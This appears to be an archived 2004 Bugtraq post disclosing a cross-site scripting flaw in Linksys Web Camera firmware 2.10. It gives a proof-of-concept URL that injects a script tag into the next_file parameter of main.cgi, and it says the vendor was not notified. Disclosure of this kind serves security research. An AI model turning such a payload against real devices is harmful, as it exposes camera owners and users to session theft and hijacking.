Linksys Web Camera Cross-site Scripting Vuln

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Linksys Web Camera Cross-site Scripting Vuln
From: Tyler Guenter aka scriptX <scriptX_@xxxxxxxxxxx>
Date: 13 Jun 2004 14:06:58 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


Linksys Web Camera version 2.10 (only tested with 2.10) is vulnerable to a 
cross-site scripting vulnerability.

Example: 
http://www.host.com/main.cgi?next_file=poop&lt;script&gt;alert('scriptX 
:P');&lt;/script&gt;

Linksys was not notified (I didnt notify them about the file inclusion vuln 
either..)

Prev by Date: Re: Eudora SPAM Issues..
Next by Date: RE: New IRC Trojan -Symantec and Trend Micro Unable To Stop Infection
Previous by thread: IRIX syssgi system call vulnerability and other security fixes
Next by thread: Skype URI callto username overflow
Index(es):
- Date
- Thread